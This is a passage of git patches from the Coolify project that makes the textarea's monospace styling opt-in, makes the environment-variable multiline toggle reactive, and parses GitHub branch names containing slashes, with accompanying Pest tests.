+    $server->id = 0;
+
+    $attributes = $server->defaultStandaloneDockerAttributes(id: 0);
+
+    expect($attributes)
+        ->toMatchArray([
+            'id' => 0,
+            'name' => 'coolify',
+            'network' => 'coolify',
+            'server_id' => 0,
+        ])
+        ->and($attributes['uuid'])->toBeString()
+        ->and($attributes['uuid'])->not->toBe('');
+});

From 3961077b900baea6d3aa4616ce88fd5c9f1b1cd2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 15:37:42 +0200
Subject: [PATCH 212/213] feat(forms): make textarea monospace opt-in and
 improve multiline toggle

Add `monospace` prop to Textarea component so font-mono is no longer
applied by default. Apply it explicitly to env variable editors, private
key fields, and shared variable forms where monospace is appropriate.

Use Alpine.js x-data/x-model to make the multiline toggle reactive
without a full Livewire round-trip. Add wire:key on the input/textarea
wrappers to force proper DOM replacement when switching modes.
---
 app/View/Components/Forms/Textarea.php        |  7 +++-
 resources/css/app.css                         |  1 +
 .../shared/environment-variable/add.blade.php | 34 +++++++++++--------
 .../shared/environment-variable/all.blade.php | 10 +++---
 .../environment-variable/show.blade.php       | 24 +++++++------
 .../security/private-key/create.blade.php     |  2 +-
 .../security/private-key/show.blade.php       |  2 +-
 .../environment/show.blade.php                |  2 +-
 .../shared-variables/project/show.blade.php   |  2 +-
 .../shared-variables/team/index.blade.php     |  2 +-
 ...ronmentVariableMultilineToggleViewTest.php | 22 ++++++++++++
 .../PasswordVisibilityComponentTest.php       | 14 ++++++++
 12 files changed, 87 insertions(+), 35 deletions(-)
 create mode 100644 tests/Feature/EnvironmentVariableMultilineToggleViewTest.php

diff --git a/app/View/Components/Forms/Textarea.php b/app/View/Components/Forms/Textarea.php
index a5303b947..02a23a26a 100644
--- a/app/View/Components/Forms/Textarea.php
+++ b/app/View/Components/Forms/Textarea.php
@@ -32,10 +32,11 @@ public function __construct(
         public bool $allowTab = false,
         public bool $spellcheck = false,
         public bool $autofocus = false,
+        public bool $monospace = false,
         public ?string $helper = null,
         public bool $realtimeValidation = false,
         public bool $allowToPeak = true,
-        public string $defaultClass = 'input scrollbar font-mono',
+        public string $defaultClass = 'input scrollbar',
         public string $defaultClassInput = 'input',
         public ?int $minlength = null,
         public ?int $maxlength = null,
@@ -81,6 +82,10 @@ public function render(): View|Closure|string
             $this->name = $this->modelBinding !== 'null' ? $this->modelBinding : (string) $this->id;
         }
 
+        if ($this->monospace) {
+            $this->defaultClass .= ' font-mono';
+        }
+
         // $this->label = Str::title($this->label);
         return view('components.forms.textarea');
     }
diff --git a/resources/css/app.css b/resources/css/app.css
index 2c30baf64..936e0c713 100644
--- a/resources/css/app.css
+++ b/resources/css/app.css
@@ -15,6 +15,7 @@
 
 @theme {
     --font-sans: 'Geist Sans', Inter, sans-serif;
+    --font-mono: 'Geist Mono', 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, monospace;
     --font-geist-sans: 'Geist Sans', Inter, sans-serif;
     --font-logs: 'Geist Mono', 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, monospace;
 
diff --git a/resources/views/livewire/project/shared/environment-variable/add.blade.php b/resources/views/livewire/project/shared/environment-variable/add.blade.php
index 3d757ee63..4ce8c1b0e 100644
--- a/resources/views/livewire/project/shared/environment-variable/add.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/add.blade.php
@@ -1,17 +1,23 @@
-<form class="flex flex-col w-full gap-2 rounded-sm" wire:submit='submit'>
+<form class="flex flex-col w-full gap-2 rounded-sm" wire:submit='submit'
+    x-data="{ isMultiline: $wire.entangle('is_multiline') }">
     <x-forms.input placeholder="NODE_ENV" id="key" label="Name" required />
-    @if ($is_multiline)
-        <x-forms.textarea id="value" label="Value" required />
-    @else
-        <x-forms.env-var-input placeholder="production" id="value" label="Value" required
-            :availableVars="$shared ? [] : $this->availableSharedVariables"
-            :projectUuid="data_get($parameters, 'project_uuid')"
-            :environmentUuid="data_get($parameters, 'environment_uuid')"
-            :serverUuid="data_get($parameters, 'server_uuid')" />
-    @endif
+    <template x-if="isMultiline">
+        <div wire:key="env-value-textarea">
+            <x-forms.textarea id="value" label="Value" required class="font-sans" spellcheck />
+        </div>
+    </template>
+    <template x-if="!isMultiline">
+        <div wire:key="env-value-input">
+            <x-forms.env-var-input placeholder="production" id="value" label="Value" required
+                :availableVars="$shared ? [] : $this->availableSharedVariables"
+                :projectUuid="data_get($parameters, 'project_uuid')"
+                :environmentUuid="data_get($parameters, 'environment_uuid')"
+                :serverUuid="data_get($parameters, 'server_uuid')" />
+        </div>
+    </template>
 
-    @if (!$shared && !$is_multiline)
-        <div class="text-xs text-neutral-500 dark:text-neutral-400 -mt-1">
+    @if (!$shared)
+        <div x-cloak x-show="!isMultiline" wire:key="env-value-tip" class="text-xs text-neutral-500 dark:text-neutral-400 -mt-1">
             Tip: Type <span class="font-mono dark:text-warning text-coollabs">{{</span> to reference a shared environment
             variable
         </div>
@@ -34,8 +40,8 @@
             label="Is Literal?" />
     @endif
 
-    <x-forms.checkbox id="is_multiline" label="Is Multiline?" />
+    <x-forms.checkbox id="is_multiline" x-model="isMultiline" label="Is Multiline?" />
     <x-forms.button type="submit" @click="slideOverOpen=false">
         Save
     </x-forms.button>
-</form>
\ No newline at end of file
+</form>
diff --git a/resources/views/livewire/project/shared/environment-variable/all.blade.php b/resources/views/livewire/project/shared/environment-variable/all.blade.php
index a962b2cec..28c67c5b4 100644
--- a/resources/views/livewire/project/shared/environment-variable/all.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/all.blade.php
@@ -84,24 +84,24 @@
                     Inline comments with space before # (e.g., <code class="font-mono">KEY=value #comment</code>) are stripped.
                 </x-callout>
 
-                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
                     label="Production Environment Variables"></x-forms.textarea>
 
                 @if ($showPreview)
-                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables"
+                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables" monospace
                         id="variablesPreview" wire:model="variablesPreview"></x-forms.textarea>
                 @endif
 
                 <x-forms.button type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
             @else
-                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
                     label="Production Environment Variables" disabled></x-forms.textarea>
 
                 @if ($showPreview)
-                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables"
+                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables" monospace
                         id="variablesPreview" wire:model="variablesPreview" disabled></x-forms.textarea>
                 @endif
             @endcan
         </form>
     @endif
-</div>
\ No newline at end of file
+</div>
diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index 059595221..6e93d296b 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -150,17 +150,21 @@
                         <div class="flex flex-col w-full gap-2 lg:flex-row">
                             @if ($is_multiline)
                                 <x-forms.input :required="$is_redis_credential" isMultiline="{{ $is_multiline }}" id="key" />
-                                <x-forms.textarea :required="$is_redis_credential" type="password" id="value" />
+                                <div class="flex-1" wire:key="env-show-value-textarea-{{ $env->id }}">
+                                    <x-forms.textarea :required="$is_redis_credential" type="password" id="value" />
+                                </div>
                             @else
                                 <x-forms.input :disabled="$is_redis_credential" :required="$is_redis_credential" id="key" />
-                                <x-forms.env-var-input
-                                    :required="$is_redis_credential"
-                                    type="password"
-                                    id="value"
-                                    :availableVars="$isSharedVariable ? [] : $this->availableSharedVariables"
-                                    :projectUuid="data_get($parameters, 'project_uuid')"
-                                    :environmentUuid="data_get($parameters, 'environment_uuid')"
-                                    :serverUuid="data_get($parameters, 'server_uuid')" />
+                                <div class="flex-1" wire:key="env-show-value-input-{{ $env->id }}">
+                                    <x-forms.env-var-input
+                                        :required="$is_redis_credential"
+                                        type="password"
+                                        id="value"
+                                        :availableVars="$isSharedVariable ? [] : $this->availableSharedVariables"
+                                        :projectUuid="data_get($parameters, 'project_uuid')"
+                                        :environmentUuid="data_get($parameters, 'environment_uuid')"
+                                        :serverUuid="data_get($parameters, 'server_uuid')" />
+                                </div>
                             @endif
                             @if ($is_shared)
                                 <x-forms.input :disabled="$is_redis_credential" :required="$is_redis_credential" disabled
@@ -312,4 +316,4 @@
         @endif
 
     </form>
-</div>
\ No newline at end of file
+</div>
diff --git a/resources/views/livewire/security/private-key/create.blade.php b/resources/views/livewire/security/private-key/create.blade.php
index 4294823e0..fb0306265 100644
--- a/resources/views/livewire/security/private-key/create.blade.php
+++ b/resources/views/livewire/security/private-key/create.blade.php
@@ -13,7 +13,7 @@
             <x-forms.input id="name" label="Name" required />
             <x-forms.input id="description" label="Description" />
         </div>
-        <x-forms.textarea realtimeValidation id="value" rows="10"
+        <x-forms.textarea realtimeValidation id="value" rows="10" monospace
             placeholder="-----BEGIN OPENSSH PRIVATE KEY-----" label="Private Key" required />
         <x-forms.input id="publicKey" readonly label="Public Key" />
         <span class="pt-2 pb-4 font-bold dark:text-warning">ACTION REQUIRED: Copy the 'Public Key' to your server's
diff --git a/resources/views/livewire/security/private-key/show.blade.php b/resources/views/livewire/security/private-key/show.blade.php
index 7d90b5005..a8bd17d4a 100644
--- a/resources/views/livewire/security/private-key/show.blade.php
+++ b/resources/views/livewire/security/private-key/show.blade.php
@@ -56,7 +56,7 @@
                             required disabled />
                     </div>
                     <div x-cloak x-show="showPrivateKey">
-                        <x-forms.textarea canGate="update" :canResource="$private_key" rows="10" id="privateKeyValue" required />
+                        <x-forms.textarea canGate="update" :canResource="$private_key" rows="10" id="privateKeyValue" required monospace />
                     </div>
                 </div>
             </div>
diff --git a/resources/views/livewire/shared-variables/environment/show.blade.php b/resources/views/livewire/shared-variables/environment/show.blade.php
index fde2d0ae8..0822fff10 100644
--- a/resources/views/livewire/shared-variables/environment/show.blade.php
+++ b/resources/views/livewire/shared-variables/environment/show.blade.php
@@ -26,7 +26,7 @@ class="dark:text-warning text-coollabs">@{{ environment.VARIABLENAME }}</span><x
         </div>
     @else
         <form wire:submit='submit' class="flex flex-col gap-2">
-            <x-forms.textarea canGate="update" :canResource="$environment" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+            <x-forms.textarea canGate="update" :canResource="$environment" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
                 label="Environment Shared Variables"></x-forms.textarea>
             <x-forms.button canGate="update" :canResource="$environment" type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
         </form>
diff --git a/resources/views/livewire/shared-variables/project/show.blade.php b/resources/views/livewire/shared-variables/project/show.blade.php
index f89ad9ce7..2d839d26d 100644
--- a/resources/views/livewire/shared-variables/project/show.blade.php
+++ b/resources/views/livewire/shared-variables/project/show.blade.php
@@ -28,7 +28,7 @@
         </div>
     @else
         <form wire:submit='submit' class="flex flex-col gap-2">
-            <x-forms.textarea canGate="update" :canResource="$project" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+            <x-forms.textarea canGate="update" :canResource="$project" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
                 label="Project Shared Variables"></x-forms.textarea>
             <x-forms.button canGate="update" :canResource="$project" type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
         </form>
diff --git a/resources/views/livewire/shared-variables/team/index.blade.php b/resources/views/livewire/shared-variables/team/index.blade.php
index fcfca35fb..04d2a5713 100644
--- a/resources/views/livewire/shared-variables/team/index.blade.php
+++ b/resources/views/livewire/shared-variables/team/index.blade.php
@@ -27,7 +27,7 @@ class="dark:text-warning text-coollabs">@{{ team.VARIABLENAME }}</span> <x-helpe
         </div>
     @else
         <form wire:submit='submit' class="flex flex-col gap-2">
-            <x-forms.textarea canGate="update" :canResource="$team" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+            <x-forms.textarea canGate="update" :canResource="$team" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
                 label="Team Shared Variables"></x-forms.textarea>
             <x-forms.button canGate="update" :canResource="$team" type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
         </form>
diff --git a/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php b/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php
new file mode 100644
index 000000000..636e5eb66
--- /dev/null
+++ b/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php
@@ -0,0 +1,22 @@
+<?php
+
+it('uses Alpine entangle to switch add value field immediately when multiline is enabled', function () {
+    $view = file_get_contents(resource_path('views/livewire/project/shared/environment-variable/add.blade.php'));
+
+    expect($view)
+        ->toContain('x-data="{ isMultiline: $wire.entangle(\'is_multiline\') }"')
+        ->toContain('<template x-if="isMultiline">')
+        ->toContain('<template x-if="!isMultiline">')
+        ->toContain('x-model="isMultiline"')
+        ->toContain('<x-forms.textarea id="value" label="Value" required class="font-sans" spellcheck />')
+        ->toContain('wire:key="env-value-textarea"')
+        ->toContain('wire:key="env-value-input"');
+});
+
+it('uses distinct keyed branches for the edit value field modes', function () {
+    $view = file_get_contents(resource_path('views/livewire/project/shared/environment-variable/show.blade.php'));
+
+    expect($view)
+        ->toContain('wire:key="env-show-value-textarea-{{ $env->id }}"')
+        ->toContain('wire:key="env-show-value-input-{{ $env->id }}"');
+});
diff --git a/tests/Feature/PasswordVisibilityComponentTest.php b/tests/Feature/PasswordVisibilityComponentTest.php
index efc0e27cf..a5087f5cd 100644
--- a/tests/Feature/PasswordVisibilityComponentTest.php
+++ b/tests/Feature/PasswordVisibilityComponentTest.php
@@ -31,6 +31,20 @@
         ->not->toContain('changePasswordFieldType');
 });
 
+it('renders textarea without monospace classes by default', function () {
+    $html = Blade::render('<x-forms.textarea id="notes" />');
+
+    expect($html)
+        ->toContain('class="input scrollbar"')
+        ->not->toContain('font-mono');
+});
+
+it('renders textarea with monospace classes when requested', function () {
+    $html = Blade::render('<x-forms.textarea id="variables" monospace />');
+
+    expect($html)->toContain('class="input scrollbar font-mono"');
+});
+
 it('resets password visibility on success event for env-var-input', function () {
     $html = Blade::render('<x-forms.env-var-input type="password" id="secret" />');
 

From 968508583d31c93bb3783d8cb17276e92280f64d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 1 Apr 2026 09:11:56 +0200
Subject: [PATCH 213/213] fix(project): handle slash branches in public repo
 URLs

Parse `/tree/...` URLs by first capturing the full branch candidate, then
iteratively resolving valid branch names for GitHub API lookups and deriving
the remaining path as base directory. Also adjust env var editor/input view
classes (`font-sans`, `w-full`) and add/extend feature tests for both branch
parsing and multiline toggle rendering.
---
 .../Project/New/PublicGitRepository.php       | 38 +++++++---
 .../shared/environment-variable/all.blade.php |  8 +--
 .../environment-variable/show.blade.php       |  2 +-
 ...ronmentVariableMultilineToggleViewTest.php |  9 +++
 .../PublicGitRepositoryBranchParsingTest.php  | 71 +++++++++++++++++++
 5 files changed, 113 insertions(+), 15 deletions(-)
 create mode 100644 tests/Feature/PublicGitRepositoryBranchParsingTest.php

diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 62ac7ec0d..dbfa15a55 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -208,13 +208,8 @@ private function getGitSource()
 
         if ($this->repository_url_parsed->getSegment(3) === 'tree') {
             $path = str($this->repository_url_parsed->getPath())->trim('/');
-            $this->git_branch = str($path)->after('tree/')->before('/')->value();
-            $this->base_directory = str($path)->after($this->git_branch)->after('/')->value();
-            if (filled($this->base_directory)) {
-                $this->base_directory = '/'.$this->base_directory;
-            } else {
-                $this->base_directory = '/';
-            }
+            $this->git_branch = str($path)->after('tree/')->value();
+            $this->base_directory = '/';
         } else {
             $this->git_branch = 'main';
         }
@@ -235,9 +230,32 @@ private function getBranch()
             return;
         }
         if ($this->git_source->getMorphClass() === GithubApp::class) {
-            ['rate_limit_remaining' => $this->rate_limit_remaining, 'rate_limit_reset' => $this->rate_limit_reset] = githubApi(source: $this->git_source, endpoint: "/repos/{$this->git_repository}/branches/{$this->git_branch}");
-            $this->rate_limit_reset = Carbon::parse((int) $this->rate_limit_reset)->format('Y-M-d H:i:s');
-            $this->branchFound = true;
+            $originalBranch = $this->git_branch;
+            $branchToTry = $originalBranch;
+
+            while (true) {
+                try {
+                    $encodedBranch = urlencode($branchToTry);
+                    ['rate_limit_remaining' => $this->rate_limit_remaining, 'rate_limit_reset' => $this->rate_limit_reset] = githubApi(source: $this->git_source, endpoint: "/repos/{$this->git_repository}/branches/{$encodedBranch}");
+                    $this->rate_limit_reset = Carbon::parse((int) $this->rate_limit_reset)->format('Y-M-d H:i:s');
+                    $this->git_branch = $branchToTry;
+
+                    $remaining = str($originalBranch)->after($branchToTry)->trim('/')->value();
+                    $this->base_directory = filled($remaining) ? '/'.$remaining : '/';
+
+                    $this->branchFound = true;
+
+                    return;
+                } catch (\Throwable $e) {
+                    if (str_contains($branchToTry, '/')) {
+                        $branchToTry = str($branchToTry)->beforeLast('/')->value();
+
+                        continue;
+                    }
+
+                    throw $e;
+                }
+            }
         }
     }
 
diff --git a/resources/views/livewire/project/shared/environment-variable/all.blade.php b/resources/views/livewire/project/shared/environment-variable/all.blade.php
index 28c67c5b4..2ae3ad166 100644
--- a/resources/views/livewire/project/shared/environment-variable/all.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/all.blade.php
@@ -84,21 +84,21 @@
                     Inline comments with space before # (e.g., <code class="font-mono">KEY=value #comment</code>) are stripped.
                 </x-callout>
 
-                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
+                <x-forms.textarea rows="10" class="whitespace-pre-wrap font-sans" id="variables" wire:model="variables"
                     label="Production Environment Variables"></x-forms.textarea>
 
                 @if ($showPreview)
-                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables" monospace
+                    <x-forms.textarea rows="10" class="whitespace-pre-wrap font-sans" label="Preview Deployments Environment Variables"
                         id="variablesPreview" wire:model="variablesPreview"></x-forms.textarea>
                 @endif
 
                 <x-forms.button type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
             @else
-                <x-forms.textarea rows="10" class="whitespace-pre-wrap" id="variables" wire:model="variables" monospace
+                <x-forms.textarea rows="10" class="whitespace-pre-wrap font-sans" id="variables" wire:model="variables"
                     label="Production Environment Variables" disabled></x-forms.textarea>
 
                 @if ($showPreview)
-                    <x-forms.textarea rows="10" class="whitespace-pre-wrap" label="Preview Deployments Environment Variables" monospace
+                    <x-forms.textarea rows="10" class="whitespace-pre-wrap font-sans" label="Preview Deployments Environment Variables"
                         id="variablesPreview" wire:model="variablesPreview" disabled></x-forms.textarea>
                 @endif
             @endcan
diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index 6e93d296b..b873a6f05 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -155,7 +155,7 @@
                                 </div>
                             @else
                                 <x-forms.input :disabled="$is_redis_credential" :required="$is_redis_credential" id="key" />
-                                <div class="flex-1" wire:key="env-show-value-input-{{ $env->id }}">
+                                <div class="w-full" wire:key="env-show-value-input-{{ $env->id }}">
                                     <x-forms.env-var-input
                                         :required="$is_redis_credential"
                                         type="password"
diff --git a/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php b/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php
index 636e5eb66..e27fd0b4b 100644
--- a/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php
+++ b/tests/Feature/EnvironmentVariableMultilineToggleViewTest.php
@@ -20,3 +20,12 @@
         ->toContain('wire:key="env-show-value-textarea-{{ $env->id }}"')
         ->toContain('wire:key="env-show-value-input-{{ $env->id }}"');
 });
+
+it('uses sans font for the developer bulk environment variable editor', function () {
+    $view = file_get_contents(resource_path('views/livewire/project/shared/environment-variable/all.blade.php'));
+
+    expect($view)
+        ->toContain('class="whitespace-pre-wrap font-sans"')
+        ->not->toContain('wire:model="variables" monospace')
+        ->not->toContain('wire:model="variablesPreview" monospace');
+});
diff --git a/tests/Feature/PublicGitRepositoryBranchParsingTest.php b/tests/Feature/PublicGitRepositoryBranchParsingTest.php
new file mode 100644
index 000000000..38f757b2e
--- /dev/null
+++ b/tests/Feature/PublicGitRepositoryBranchParsingTest.php
@@ -0,0 +1,71 @@
+<?php
+
+use Spatie\Url\Url;
+
+/**
+ * Tests for branch name parsing from Git repository URLs.
+ * Verifies that branch names containing slashes (e.g., fix/something)
+ * are correctly extracted from URLs like /tree/fix/something.
+ */
+function parseBranchFromUrl(string $url): array
+{
+    $parsed = Url::fromString($url);
+    $branch = 'main';
+    $baseDirectory = '/';
+
+    if ($parsed->getSegment(3) === 'tree') {
+        $path = str($parsed->getPath())->trim('/');
+        $branch = str($path)->after('tree/')->value();
+        $baseDirectory = '/';
+    }
+
+    return [
+        'branch' => $branch,
+        'base_directory' => $baseDirectory,
+        'repository' => $parsed->getSegment(1).'/'.$parsed->getSegment(2),
+    ];
+}
+
+test('parses simple branch from GitHub URL', function () {
+    $result = parseBranchFromUrl('https://github.com/andrasbacsai/coolify-examples/tree/main');
+
+    expect($result['branch'])->toBe('main');
+    expect($result['base_directory'])->toBe('/');
+    expect($result['repository'])->toBe('andrasbacsai/coolify-examples');
+});
+
+test('parses branch with slash from GitHub URL', function () {
+    $result = parseBranchFromUrl('https://github.com/andrasbacsai/coolify-examples-1/tree/fix/8854-env-var-fallback-volume');
+
+    expect($result['branch'])->toBe('fix/8854-env-var-fallback-volume');
+    expect($result['base_directory'])->toBe('/');
+    expect($result['repository'])->toBe('andrasbacsai/coolify-examples-1');
+});
+
+test('parses branch with multiple slashes from GitHub URL', function () {
+    $result = parseBranchFromUrl('https://github.com/user/repo/tree/feature/team/new-widget');
+
+    expect($result['branch'])->toBe('feature/team/new-widget');
+    expect($result['base_directory'])->toBe('/');
+});
+
+test('defaults to main branch when no tree segment in URL', function () {
+    $result = parseBranchFromUrl('https://github.com/andrasbacsai/coolify-examples');
+
+    expect($result['branch'])->toBe('main');
+    expect($result['base_directory'])->toBe('/');
+});
+
+test('parses version-style branch with slash from GitHub URL', function () {
+    $result = parseBranchFromUrl('https://github.com/coollabsio/coolify-examples/tree/release/v2.0');
+
+    expect($result['branch'])->toBe('release/v2.0');
+    expect($result['base_directory'])->toBe('/');
+});
+
+test('parses branch from non-GitHub URL with tree segment', function () {
+    $result = parseBranchFromUrl('https://gitlab.com/user/repo/tree/hotfix/critical-bug');
+
+    expect($result['branch'])->toBe('hotfix/critical-bug');
+    expect($result['base_directory'])->toBe('/');
+});